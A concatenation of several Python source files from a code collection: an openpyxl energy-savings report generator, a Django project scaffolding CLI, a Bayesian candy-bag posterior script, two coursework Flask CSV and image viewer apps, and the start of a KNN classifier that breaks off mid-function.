current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '单位面积值'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_per_unit_area_saving'][i], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgco2e_per_unit_area_saving'], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgce_per_unit_area_saving'], 2)
col = chr(ord(col) + 1)
current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '环比'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rates_saving'][i] * 100, 2)) + '%' \
if reporting_period_data['increment_rates_saving'][i] is not None else '-'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rate_in_kgce_saving'] * 100, 2)) + '%' \
if reporting_period_data['increment_rate_in_kgce_saving'] is not None else '-'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rate_in_kgco2e_saving'] * 100, 2)) + '%' \
if reporting_period_data['increment_rate_in_kgco2e_saving'] is not None else '-'
col = chr(ord(col) + 1)
current_row_number += 2
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 吨标准煤(TCE)占比'
current_row_number += 1
table_start_row_number = current_row_number
chart_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].font = name_small_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = '吨标准煤(TCE)占比'
current_row_number += 1
for i in range(0, ca_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = reporting_period_data['names'][i]
ws['C' + str(current_row_number)].font = name_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = round(reporting_period_data['subtotals_in_kgce_saving'][i], 2)
current_row_number += 1
table_end_row_number = current_row_number - 1
if ca_len < 4:
current_row_number = current_row_number - ca_len + 4
current_row_number += 1
pie = PieChart()
pie.title = '吨标准煤(TCE)占比'
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, 'D' + str(chart_start_row_number))
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 吨二氧化碳排放(TCO2E)占比'
current_row_number += 1
table_start_row_number = current_row_number
chart_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].font = name_small_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = '吨二氧化碳排放(TCO2E)占比'
current_row_number += 1
for i in range(0, ca_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = reporting_period_data['names'][i]
ws['C' + str(current_row_number)].font = name_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = round(reporting_period_data['subtotals_in_kgco2e_saving'][i], 2)
current_row_number += 1
table_end_row_number = current_row_number - 1
if ca_len < 4:
current_row_number = current_row_number - ca_len + 4
current_row_number += 1
pie = PieChart()
pie.title = '吨二氧化碳排放(TCO2E)占比'
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, 'D' + str(chart_start_row_number))
#############################################
has_child_space_data_flag = True
if 'child_space' not in report.keys() or \
report['child_space'] is None or \
'energy_category_names' not in report['child_space'].keys() or \
report['child_space']['energy_category_names'] is None or \
len(report['child_space']['energy_category_names']) == 0:
has_child_space_data_flag = False
if has_child_space_data_flag:
child_space_data = report['child_space']
ca_len = len(child_space_data['energy_category_names'])
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 子空间数据'
current_row_number += 1
table_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['B' + str(current_row_number)].font = name_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '子空间'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
child_space_data['energy_category_names'][i] + " (" + child_space_data['units'][i] + ")"
col = chr(ord(col) + 1)
current_row_number += 1
ca_child_len = len(child_space_data['child_space_names_array'][0])
for i in range(0, ca_child_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = child_space_data['child_space_names_array'][0][i]
current_row_number += 1
current_row_number -= ca_child_len
for i in range(0, ca_child_len):
col = 'C'
for j in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = child_space_data['subtotals_saving_array'][j][i]
col = chr(ord(col) + 1)
current_row_number += 1
table_end_row_number = current_row_number - 1
col = 'B'
for i in range(0, ca_len):
pie = PieChart()
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3 + i, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.title = reporting_period_data['names'][i] + " (" + \
reporting_period_data['units'][i] + ")"
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, col + str(current_row_number))
col = chr(ord(col) + 2)
current_row_number += 6
################################
has_values_saving_data = True
has_timestamps_data = True
if 'values_saving' not in reporting_period_data.keys() or \
reporting_period_data['values_saving'] is None or \
len(reporting_period_data['values_saving']) == 0:
has_values_saving_data = False
if 'timestamps' not in reporting_period_data.keys() or \
reporting_period_data['timestamps'] is None or \
len(reporting_period_data['timestamps']) == 0 or \
len(reporting_period_data['timestamps'][0]) == 0:
has_timestamps_data = False
if has_values_saving_data and has_timestamps_data:
ca_len = len(reporting_period_data['names'])
time = reporting_period_data['timestamps'][0]
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 详细数据'
current_row_number += 1
chart_start_row_number = current_row_number
current_row_number += ca_len * 5
table_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '日期时间'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
reporting_period_data['names'][i] + " (" + reporting_period_data['units'][i] + ")"
col = chr(ord(col) + 1)
current_row_number += 1
for i in range(0, len(time)):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = time[i]
col = 'C'
for j in range(0, ca_len):
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['values_saving'][j][i], 2) \
if reporting_period_data['values_saving'][j][i] is not None else 0.00
col = chr(ord(col) + 1)
current_row_number += 1
table_end_row_number = current_row_number - 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '小计'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_saving'][i], 2)
col = chr(ord(col) + 1)
current_row_number += 2
format_time_width_number = 1.0
min_len_number = 1.0
min_width_number = 11.0 # format_time_width_number * min_len_number + 4 and min_width_number > 11.0
if period_type == 'hourly':
format_time_width_number = 4.0
min_len_number = 2
min_width_number = 12.0
elif period_type == 'daily':
format_time_width_number = 2.5
min_len_number = 4
min_width_number = 14.0
elif period_type == 'monthly':
format_time_width_number = 2.1
min_len_number = 4
min_width_number = 12.4
elif period_type == 'yearly':
format_time_width_number = 1.5
min_len_number = 5
min_width_number = 11.5
for i in range(0, ca_len):
bar = BarChart()
bar.title = \
reporting_period_data['names'][i] + " (" + reporting_period_data['units'][i] + ")"
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
bar_data = Reference(ws, min_col=3 + i, min_row=table_start_row_number, max_row=table_end_row_number)
bar.add_data(bar_data, titles_from_data=True)
bar.set_categories(labels)
bar.height = 5.25
bar.width = format_time_width_number * len(time) if len(time) > min_len_number else min_width_number
bar.dLbls = DataLabelList()
bar.dLbls.showVal = True
bar.dLbls.showPercent = True
chart_col = 'B'
chart_cell = chart_col + str(chart_start_row_number)
chart_start_row_number += 5
ws.add_chart(bar, chart_cell)
filename = str(uuid.uuid4()) + '.xlsx'
wb.save(filename)
return filename
``` |
{
"source": "824750130/django-cli",
"score": 2
} |
#### File: builder/core/file_content.py
```python
git_ignore_content = '''__pycache__/
*.py[cod]
*$py.class
.idea/
.vscode/
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
env/
venv/
'''
init_db_content = '''import pymysql
pymysql.install_as_MySQLdb()
'''
models_content = '''from django.db import models
# class User(models.Model):
# username = models.CharField(max_length=32, unique=True)
'''
admin_content = '''from django.contrib import admin
# from {0} import models
# admin.site.register(models.User)
'''
apps_content = """from django.apps import AppConfig
class App1Config(AppConfig):
name = '{0}'
"""
manage_content = """import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
"""
setting_content = """import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '%s'
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',%s
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = '%s.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = '%s.wsgi.application'
DATABASES = %s
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
"""
wsgi_content = """import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
application = get_wsgi_application()
"""
asgi_content = """import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
application = get_asgi_application()
"""
gunicorn_content = '''import multiprocessing
bind = '0.0.0.0:8080'
timeout = 30
worker_class = '{0}'
workers = multiprocessing.cpu_count() * 2 + 1
threads = 2
'''
uwsgi_content = '''[uwsgi]
http=0.0.0.0:8000
master = true
harakiri = 30
processes = 9
'''
```
#### File: builder/core/git.py
```python
from .common import wopen
from ..config import CHOICE_RES
from .file_content import git_ignore_content
def create_git_ignore(pro_name):
print(f'Creating file: {pro_name}/.gitignore')
with wopen(f'project/{pro_name}/.gitignore') as f:
f.write(git_ignore_content)
def create():
pro_name = CHOICE_RES['project_name']
create_git_ignore(pro_name)
```
#### File: builder/core/project.py
```python
import os
import random
from ..config import CHOICE_RES
from .common import wopen
from .file_content import *
def get_random_string(length):
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
return ''.join(random.choice(chars) for i in range(length))
def create_application(pro_name, app_conf):
app_name = app_conf['name']
views = app_conf['views']
app_path = 'project/' + pro_name + '/' + app_name
os.makedirs(app_path)
os.makedirs(app_path + '/migrations')
print(f'Creating file: {app_path}/migrations/__init__.py')
wopen(f'{app_path}/migrations/__init__.py').close()
if views:
os.makedirs(app_path + '/views')
else:
print(f'Creating file: {app_path}/views.py')
wopen(f'{app_path}/views.py').close()
print(f'Creating file: {app_path}/__init__.py')
if CHOICE_RES['database'].get('engine') == 'mysql':
with wopen(f'{app_path}/__init__.py') as f:
f.write(init_db_content)
else:
wopen(f'{app_path}/__init__.py').close()
with wopen(f'{app_path}/admin.py') as f:
f.write(admin_content.format(app_name))
print(f'Creating file: {app_path}/apps.py')
with wopen(f'{app_path}/apps.py') as f:
f.write(apps_content.format(app_name))
print(f'Creating file: {app_path}/models.py')
with wopen(f'{app_path}/models.py') as f:
f.write(models_content)
print(f'Creating file: {app_path}/test.py')
with wopen(f'{app_path}/test.py') as f:
f.write('from django.test import TestCase')
django_vision = CHOICE_RES['django_vision']
if django_vision.startswith('1'):
urls_content = '''from django.conf.urls import url
urlpatterns = [
]
'''
else:
urls_content = '''from django.urls import path, include
urlpatterns = [
]
'''
print(f'Creating file: {app_path}/urls.py')
with wopen(f'{app_path}/urls.py') as f:
f.write(urls_content)
return app_name
def create_project(pro_name):
pro_path = 'project/' + pro_name + '/' + pro_name
templates_path = 'project/' + pro_name + '/templates'
os.makedirs(pro_path)
os.makedirs(templates_path)
def create_manage_file(pro_name):
print('Creating file: manage.py')
with wopen(f'project/{pro_name}/manage.py') as f:
f.write(manage_content.format(pro_name))
wopen(f'project/{pro_name}/test.py').close()
def create_root_dir_file(pro_name):
secret_key = get_random_string(50)
pro_path = 'project/' + pro_name
database_conf = CHOICE_RES['database']
application_conf = CHOICE_RES['application']
if application_conf is None:
application = ''
else:
application = ''
for app in application_conf:
# 创建app并返回app_name
app_name = create_application(pro_name, app)
application += "\r\n\t'" + app_name + "',"
if not database_conf:
database = '''{
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
'''
else:
engine = database_conf['engine']
host = database_conf.get('host', '127.0.0.1')
port = database_conf.get('port', '3306')
db = database_conf.get('db')
user = database_conf.get('user', 'root')
password = database_conf.get('password', '')
database = '''{
'default': {
'ENGINE': 'django.db.backends.%s',
'NAME': '%s',
'HOST': '%s',
'PORT': '%s',
'USER': '%s',
'PASSWORD': <PASSWORD>',
}
}
''' % (engine, db, host, port, user, password)
wopen(f'{pro_path}/{pro_name}/__init__.py').close()
print(f'Creating file: {pro_name}/setting.py')
with wopen(f'{pro_path}/{pro_name}/setting.py') as f:
f.write(setting_content % (secret_key, application, pro_name, pro_name, database))
django_vision = CHOICE_RES['django_vision']
if django_vision.startswith('1'):
from_url = 'from django.conf.urls import url, include'
else:
from_url = 'from django.urls import path, include'
url_app = ''
if application_conf:
for i, app in enumerate(application_conf):
app_name = app['name']
if django_vision.startswith('1'):
if i == 0:
url_app += f"\turl(r'^admin/', admin.site.urls),\r\n"
url_app += f"\turl('', include('{app_name}.urls')),\r\n"
else:
if i == 0:
url_app += f"\tpath('admin/', admin.site.urls),\r\n"
url_app += f"\tpath('', include('{app_name}.urls')),\r\n"
else:
if django_vision.startswith('1'):
url_app = f"\turl(r'^admin/', admin.site.urls),\r\n"
else:
url_app = f"\tpath('admin/', admin.site.urls),\r\n"
urls_content = """from django.contrib import admin
{0}
urlpatterns = [
{1}
]
""".format(from_url, url_app)
print(f'Creating file: {pro_name}/urls.py')
with wopen(f'{pro_path}/{pro_name}/urls.py') as f:
f.write(urls_content)
print(f'Creating file: {pro_name}/wsgi.py')
with wopen(f'{pro_path}/{pro_name}/wsgi.py') as f:
f.write(wsgi_content.format(pro_name))
if django_vision.startswith('3'):
print(f'Creating file: {pro_name}/asgi.py')
with wopen(f'{pro_path}/{pro_name}/asgi.py') as f:
f.write(asgi_content.format(pro_name))
def create():
pro_name = CHOICE_RES['project_name']
create_project(pro_name)
create_manage_file(pro_name)
create_root_dir_file(pro_name)
```
#### File: 824750130/django-cli/cli.py
```python
import subprocess
from builder.config import CHOICE_RES, Config
from builder import script
from builder.core import require, project, wsgi, git, venv
def start():
# 安装键位控制包
script.pip_install('pynput', output=False)
listen = script.cc.listen
# 项目名称
project_name = CHOICE_RES['project_name']
while not project_name:
project_name = input("项目名称:")
CHOICE_RES['project_name'] = project_name
# 选择导入构建配置文件
conf = None
while conf is None:
conf = input("是否读取配置文件构建项目(y/N):")
if conf.upper() == 'Y':
CHOICE_RES['django_vision'] = Config['django_vision']
CHOICE_RES['wsgi_engine'] = Config['wsgi']['engine']
CHOICE_RES['wsgi_mode'] = Config['wsgi']['mode']
CHOICE_RES['application'] = Config['application']
CHOICE_RES['database'] = Config['database']
CHOICE_RES['docker'] = Config['docker']
require.requirement['Django'] = Config['django_vision']
if Config['wsgi']['engine']:
require.requirement[Config['wsgi']['engine']] = True
if Config['database'].get('engine') == 'mysql':
require.requirement['PyMySQL'] = True
else:
# 选择django版本
django_vision = CHOICE_RES['django_vision']
while not django_vision:
django_vision = input("选择要构建的django版本 (1.1.11):")
CHOICE_RES['django_vision'] = django_vision
require.requirement['Django'] = django_vision
# 选择wsgi服务器
listen('wsgi_engine')
wsgi_engine = CHOICE_RES['wsgi_engine']
if wsgi_engine is not None:
require.requirement[wsgi_engine] = True
listen('wsgi_mode')
# 开始创建项目
project.create()
require.create()
wsgi.create()
git.create()
# 构建虚拟环境内容
dev = 'z'
while dev.upper() != 'Y' and dev.upper() != 'N' and dev:
dev = input("是否在本地构建开发环境(Y/n):")
if dev.upper() == 'Y' or not dev:
dev_name = input(f"虚拟环境的名称(venv):")
if not dev_name:
dev_name = 'venv'
venv.create_env(dev_name)
def run():
start()
if __name__ == '__main__':
run()
``` |
{
"source": "824zzy/CSE-5360_AI",
"score": 3
} |
#### File: optional_assignment_2/task1/compute_a_posteriori.py
```python
from sys import argv
class env:
def __init__(self):
self.h1 = [0.1, 1, 0]
self.h2 = [0.2, 0.75, 0.25]
self.h3 = [0.4, 0.5, 0.5]
self.h4 = [0.2, 0.25, 0.75]
self.h5 = [0.1, 0, 1]
self.bags = [self.h1, self.h2, self.h3, self.h4, self.h5]
self.obs = 0.5
def posterior(self, cand):
for b in self.bags:
if cand=='C':
b[0] = b[1]*b[0]/self.obs
else:
b[0] = b[2]*b[0]/self.obs
def observation(self, cand):
self.obs = 0
for b in self.bags:
if cand=="C":
self.obs += b[0] * b[1]
else:
self.obs += b[0] * b[2]
return self.obs
if __name__ == "__main__":
Q = argv[1]
E = env()
f = open('result.txt', 'w')
f.write("Observation sequence Q: {}\n".format(Q))
f.write("Length of Q: {}\n".format(len(Q)))
Q += 'C' # for the sake of extra probability of candy
E.observation(Q[0])
for i in range(len(Q)-1):
f.write("\nAfter Observation {}: {}\n\n".format(i+1, Q[i]))
E.posterior(Q[i])
curr = E.observation(Q[i+1])
for j in range(len(E.bags)):
f.write("P(h{} | Q) = {}\n".format(j+1, E.bags[j][0]))
if Q[i+1]=='C':
f.write("\nProbability that the next candy we pick will be C, given Q: {}".format(curr))
f.write("\nProbability that the next candy we pick will be L, given Q: {}\n".format(1-curr))
else:
f.write("\nProbability that the next candy we pick will be C, given Q: {}".format(1-curr))
f.write("\nProbability that the next candy we pick will be L, given Q: {}\n".format(curr))
``` |
{
"source": "824zzy/CSE6331_CloudComputing",
"score": 3
} |
#### File: CSE6331_CloudComputing/hw1/main.py
```python
from flask import Flask, render_template, request, url_for, abort, redirect
from flask_cloudy import Storage
import os
import pandas as pd
port = int(os.getenv('PORT', 8000))
curr_file = None
app = Flask(__name__)
app.config.update({
"STORAGE_PROVIDER": "LOCAL", # Can also be S3, GOOGLE_STORAGE, etc...
"STORAGE_KEY": "",
"STORAGE_SECRET": "",
"STORAGE_CONTAINER": "./files", # a directory path for local, bucket name of cloud
"STORAGE_SERVER": True,
"STORAGE_SERVER_URL": "/files" # The url endpoint to access files on LOCAL provider
})
# Setup storage
storage = Storage()
storage.init_app(app)
@app.route("/")
def index():
csv_obj, other_obj = [], []
for obj in storage:
fname = obj.name
if fname.split('.')[-1]=='csv':
csv_obj.append(obj)
else:
other_obj.append(obj)
return render_template("index.html", csv_obj=csv_obj, other_obj=other_obj)
@app.route("/view/<path:object_name>")
def view(object_name):
obj = storage.get(object_name)
f_type = obj.name.split('.')[-1]
if f_type=='csv':
df = pd.read_csv('.'+obj.url, engine='python')
global curr_file
curr_file = '.'+obj.url
img_list = df['Picture'].values.tolist()
names = df['Name'].values.tolist()
img_urls = ['./files/'+u for u in img_list if isinstance(u, str)]
info = df.values.tolist()
elif f_type=='jpg':
info, img_urls, names = None, None, None
else:
info, img_urls, names = None, None, None
return render_template("view.html", obj=obj, info=info, img_urls=img_urls, names=names)
@app.route("/add_people", methods=["POST"])
def add_people_info():
name = request.form['ppl_name']
salary = request.form['ppl_salary']
room = request.form['ppl_room']
telnum = request.form['ppl_telnum']
keywords = request.form['ppl_keywords']
df = pd.read_csv(curr_file, engine='python')
df = df.append({'Name': name,
'Salary':salary,
'Room': room,
'Telnum': telnum,
'Keywords': keywords}, ignore_index=True)
df.to_csv(curr_file, index=False)
my_object = curr_file.split('/')[-1]
return redirect(url_for("view", object_name=my_object))
@app.route("/remove_people", methods=["POST"])
def remove_people():
name = request.form['rm_name']
df = pd.read_csv(curr_file, engine='python')
df = df[df.Name != name]
df.to_csv(curr_file, index=False)
my_object = curr_file.split('/')[-1]
return redirect(url_for("view", object_name=my_object))
@app.route("/upload", methods=["POST"])
def upload():
usr_file = request.files.get("file")
storage.upload(usr_file)
return redirect("/")
@app.route("/people", methods=['POST'])
def search_people():
target_name = request.form['pplname']
target_url = './files/'+target_name+'.jpg'
if not os.path.exists(target_url):
target_url = None
return render_template("people.html", img_url=target_url)
@app.route("/people_by_salary", methods=['POST'])
def search_people_by_salary():
min_salary = request.form['min_salary']
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if line[1]<int(min_salary):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4]])
return render_template("people_by_salary.html", people=resp)
@app.route("/change_info", methods=['POST'])
def change_people_info():
ppl = request.form['change_people']
area = request.form['change_area']
val = request.form['target_value']
df = pd.read_csv(curr_file, engine='python')
df.at[df['Name']==ppl, area] = int(val)
info = df.values.tolist()
print('bb', info, df[df['Name']==ppl][area])
df.to_csv(curr_file, index=False)
img_url = './files/'+ ppl + '.jpg'
return render_template("change_info.html", info=info, img_url=img_url)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
```
#### File: CSE6331_CloudComputing/quiz0/main.py
```python
import os
from flask import Flask, render_template, request, url_for, abort, redirect
from flask_cloudy import Storage
import pandas as pd
import math
port = int(os.getenv('PORT', 8000))
curr_file = None
app = Flask(__name__)
app.config.update({
"STORAGE_PROVIDER": "LOCAL", # Can also be S3, GOOGLE_STORAGE, etc...
"STORAGE_KEY": "",
"STORAGE_SECRET": "",
"STORAGE_CONTAINER": "./files", # a directory path for local, bucket name of cloud
"STORAGE_SERVER": True,
"STORAGE_SERVER_URL": "/files" # The url endpoint to access files on LOCAL provider
})
# Setup storage
storage = Storage()
storage.init_app(app)
@app.route("/")
def index():
csv_obj, other_obj = [], []
for obj in storage:
fname = obj.name
if fname.split('.')[-1]=='csv':
csv_obj.append(obj)
else:
other_obj.append(obj)
return render_template("index.html", csv_obj=csv_obj, other_obj=other_obj)
@app.route("/view/<path:object_name>")
def view(object_name):
obj = storage.get(object_name)
f_type = obj.name.split('.')[-1]
if f_type=='csv':
df = pd.read_csv('.'+obj.url, engine='python')
global curr_file
curr_file = '.'+obj.url
img_list = df['Picture'].values.tolist()
names = df['Name'].values.tolist()
img_urls = ['./files/'+u for u in img_list if isinstance(u, str)]
info = df.values.tolist()
elif f_type=='jpg':
info, img_urls, names = None, None, None
else:
info, img_urls, names = None, None, None
return render_template("view.html", obj=obj, info=info, img_urls=img_urls, names=names)
@app.route("/upload", methods=["POST"])
def upload():
usr_file = request.files.get("file")
my_object = storage.upload(usr_file)
return redirect(url_for("view", object_name=my_object.name))
@app.route("/people_by_grade", methods=['POST'])
def search_people_by_grade():
low = request.form['low_grade']
high = request.form['high_grade']
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if line[1] != ' ' and not math.isnan(float(line[1])):
if int(low)<=int(line[1])<=int(high):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4], line[3]])
return render_template("people_by_grade.html", grade_resp=resp)
@app.route("/people_by_room", methods=['POST'])
def search_people_by_room():
room_number = int(float(request.form['room_number']))
# print('daad', room_number, type(room_number))
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if not math.isnan(line[2]):
if int(line[2])==int(room_number):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4]])
return render_template("people_by_room.html", people=resp)
@app.route("/change_info", methods=['POST'])
def change_people_info():
ppl = request.form['change_people']
area = request.form['change_area']
val = request.form['target_value']
df = pd.read_csv(curr_file, engine='python')
df.at[df['Name']==ppl, area] = int(val)
info = df.values.tolist()
df.to_csv(curr_file, index=False)
img_url = './files/'+ ppl + '.jpg'
return render_template("change_info.html", info=info, img_url=img_url)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
``` |
{
"source": "824zzy/CSE-6363_MACHINE-LEARNING",
"score": 4
} |
#### File: CSE-6363_MACHINE-LEARNING/Project2/mainB.py
```python
import math
class KNN:
def __init__(self, K):
self.K = K
self.distances = []
self.k_neighbors = []
@staticmethod
def distance(X1, X2):
dist = 0
for (x1, x2) in zip(X1, X2):
dist += (x1 - x2) ** 2
return dist
def fit_predict(self, X_train, y_train, test_sample):
self.k_neighbors, self.distances = [], []
for X, y in zip(X_train, y_train):
d = self.distance(X, test_sample)
self.distances.append((X, y, d))
self.distances.sort(key=lambda x: x[-1]) # sort by distance
self.k_neighbors = [sample[0:-1] for sample in self.distances[0:self.K]]
label_votes={}
for neighbor in self.k_neighbors:
label = neighbor[-1]
if label in label_votes.keys():
label_votes[label] += 1
else:
